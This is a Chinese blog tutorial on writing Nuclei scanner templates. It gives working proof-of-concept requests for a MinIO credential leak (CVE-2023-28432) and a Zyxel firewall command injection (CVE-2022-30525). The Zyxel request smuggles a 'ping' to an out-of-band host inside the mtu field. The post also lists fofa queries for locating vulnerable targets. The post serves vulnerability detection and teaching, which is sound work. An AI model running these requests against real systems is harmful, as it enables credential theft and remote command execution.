漏洞扫描-nuclei-poc编写

最新推荐文章于 2024-05-25 19:12:07 发布
最新推荐文章于 2024-05-25 19:12:07 发布
阅读量850 收藏 2
点赞数
文章标签: 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/134342784
版权

0x00 nuclei

Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。 提供TCP、DNS、HTTP、FILE 等各类协议的扫描,通过强大且灵活的模板,可以使用Nuclei模拟各种安全检查。

0x01 poc编写规则-yaml语法特点

大小写敏感
缩进敏感
不允许tab,只能空格

0x02 yaml的五步模板

id:编号
info:漏洞描述情况(级别,编号,标签,简介等)
http:漏洞利用核心, {{xx}}:提取目标地址的匹配信息
提取器/匹配器:提取,匹配返回包内容,匹配出需要的目标(根据目标结果特征用匹配还是提取)

编写方法流程:
1.选用套用模板
2.创建独立编号
3.填写漏洞详情
4.poc协议
5.匹配方案
6.提取方案

0x03 cve-2023-28432MiniO信息泄露

id: CVE-2023-28432

info:
  name: CVE-2023-28432 MinIO 信息泄露漏洞
  author: gaobai
  severity: high
  description: |
    CVE-2023-28432 MinIO 信息泄露漏洞,可以直接获取user和password
  reference:
    - https://github.com/vulhub/vulhub/blob/master/minio/CVE-2023-28432/
    - fofa:banner=“MinIO” || header=“MinIO” || title=“MinIO Browser”

http:
  - raw:
      - |
        POST /minio/bootstrap/v1/verify HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

        
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'MINIO_SECRET_KEY'
          - 'MINIO_ROOT_PASSWORD'
      - type: status
        status:
          - 200

0x04 cve-2022-30525 Zyxel 防火墙远程命令注入漏洞

id: CVE-2022-30525

info:
  name: CVE-2022-30525 Zyxel 防火墙远程命令注入漏洞
  author: gaobai
  severity: high
  description: |
    CVE-2022-30525 Zyxel 防火墙远程命令注入漏洞
  reference:
    - https://blog.csdn.net/weixin_43080961/article/details/124776553
    - fofa:title="USG FLEX 100" || "USG FLEX 100W" || "USG FLEX 200" || "USG FLEX 500" || "USG FLEX 700"

http:
  - raw:
      - |
        POST /ztp/cgi-bin/handler HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
  
        {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"{{gaobai}}","data":"hi"}
    
    payloads:
      gaobai:
        - ";ping -c 3 {{interactsh-url}};"
    matchers-condition: and
    
    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"
      - type: status
        status:
          - 200

nuclei使用方法:

nuclei -l D:\Desktop\top500e.txt  -t D:\Desktop\CVE-2022-30525.yaml -o e.html


参考:

https://blog.csdn.net/qq_41315957/article/details/126594572
https://blog.csdn.net/qq_41315957/article/details/126594670
小迪安全
告白热
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
nuclei poc模板编写笔记(二)
A10ng_的博客
08-29 4822
笔记
nuclei编写poc提取器
N的博客
02-23 524
【代码】nuclei编写poc提取器。
Nuclei POC编写小白速通指南
weixin_55762309的博客
05-25 1396
Nuclei POC编写小白速通指南
nuclei poc模板编写笔记(一)
A10ng_的博客
08-29 7311
笔记
浅尝 Nuclei POC 编写
qq_46081990的博客
12-21 3584
本文讲解了如何使用 YAML 语言编写漏扫工具 NucleiPOC,以两个不同类型的 CVE 为例,介绍了匹配结果和匹配交互的两种情况该如何编写 POC,最后引入并介绍了一款辅助生成 Nuclei POC 模板的 BurpSuite 插件(Nuclei Template Generator Plugin)
Nuclei Poc开发
2301_80127209的博客
03-25 595
Cloud Platfrom云平台:https://cloud.projectdiscovery.io/目标演示站点:http://glkb-jqe1.aqlab.cn/nacos/#/login指纹:Nacos已知常用漏洞利用:Nacos弱口令 账密:nacos/nacosNacos 敏感信息泄露 /nacos/v1/auth/users?Nacos 任意用户创建:/nacos/v1/auth/users?Nacos通用弱口令:Win64;q=0.9返回JWT。
Nuclei漏洞扫描工具
xiaoheizi的博客
07-28 5478
提供 TCP、DNS、HTTP、FILE 等各类协议的扫描,通过强大且灵活的模板,可以使用 Nuclei 模拟各种安全检查。要检测的漏洞是CVE-2023-0126,所以进入模板目录nuclei-templates-9.5.8\http\cves\2023找到CVE-2023-0126.yaml。输入:nuclei.exe -l 2022_30525.txt -tags sonicwall。命令讲解:-l 指定目标txt文件 -tags 指定要使用的模板标签。输入:nuclei -u 目标地址。
POC模拟攻击利器 —— Nuclei入门(一)
热门推荐
liwenxiang629的博客
07-26 1万+
Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。Nuclei使用零误报的定制模板向目标发送请求,同时可以对大量主机进行快速扫描。Nuclei提供TCP、DNS、HTTP、FILE等各类协议的扫描,通过强大且灵活的模板,可以使用Nuclei模拟各种安全检查。.........
continuous-nuclei:连续运行原子核
05-20
Please read "How to Scan Continuously with Nuclei?" article here: - https://medium.com/@dwisiswant0/how-to-scan-continuously-with-nuclei-fcb7e9d8b8b9
Fiora-为PoC框架nuclei提供图形界面
02-07
Nuclei是一款现代化、速度极快的PoC框架,它专注于网络扫描和低级别的漏洞验证,其轻量级的设计使得它在大规模网络资产检查时尤为高效。然而,命令行界面虽然对于高级用户来说非常灵活,但对初学者或不熟悉命令行的...
poc编写真实案例文档
07-21
poc编写真实案例文档
nuclei 漏洞扫描工具
05-06
**Nuclei漏洞扫描工具详解** Nuclei是一款快速、可配置且轻量级的漏洞扫描工具,专门设计用于安全研究人员和渗透测试人员快速发现目标系统中的已知漏洞。这款工具以其高效和易于使用的特性在IT安全领域内备受推崇。...
nuclei-3.0.1-windows-amd64
最新发布
06-05
nuclei-3.0.1-windows-amd64】是针对Windows操作系统64位架构的Nuclei工具的版本。Nuclei是一款快速、可配置的、基于模板的安全扫描工具,主要用于网络扫描和渗透测试,以检测目标系统中的已知漏洞。它是由安全...
electron-nuclei-开源
06-28
标题中的“electron-nuclei-开源”表明这是一个基于Electron框架的开源项目,旨在帮助开发者构建现代化的桌面应用程序。Electron是由GitHub开发的一个开源框架,它允许使用Web技术(如HTML、CSS和JavaScript)来创建...
编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞
XXokok的博客
12-09 1530
编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞。使用工具一键生成Yaml文件
POC检测工具-nuclei(四)
siu~
07-28 4871
nuclei是一款基于简单的 YAML DSL 的快速且可定制的漏洞扫描器。
聊聊 Nuclei YAML 语法模版及 Pocsuite3 的兼容思路
xxwn202302的博客
08-10 957
Pocsuite3 是由知道创宇 404 实验室打造的一款基于 GPLv2 许可证开源的远程漏洞测试框架【1】。框架本身使用 Python3 开发,集成了ZoomEye、Shodan、CEye、Interactsh 等众多安全服务的 API,用户可以基于 Pocsuite3 快速编写PoC/Exp,对批量目标进行漏洞验证并获取汇总结果。Nuclei 是一款由 projectdiscovery 开源的基于 YAML 语法模板的定制化快速漏洞扫描器【2】。Nuclei
Nuclei——一款基于YAML语法模板的快速漏洞扫描工具
qq_50854662的博客
03-20 2434
Nuclei——一款基于YAML语法模板的快速漏洞扫描工具
which riscv-nuclei-elf-gcc openocd make rm这个shell命令是什么意思
06-08
这条命令是用于查询系统中是否已经安装了名为 riscv-nuclei-elf-gcc、openocd、make 和 rm 的软件。它们分别是 riscv 架构下的嵌入式处理器编译工具链、开发调试工具、编译工具和文件删除工具。当您在命令行中输入 `which` 命令以及这些软件的名称时,系统会查找这些软件的可执行文件路径,并输出这些路径。如果输出为空,则说明您的系统中没有安装这些软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值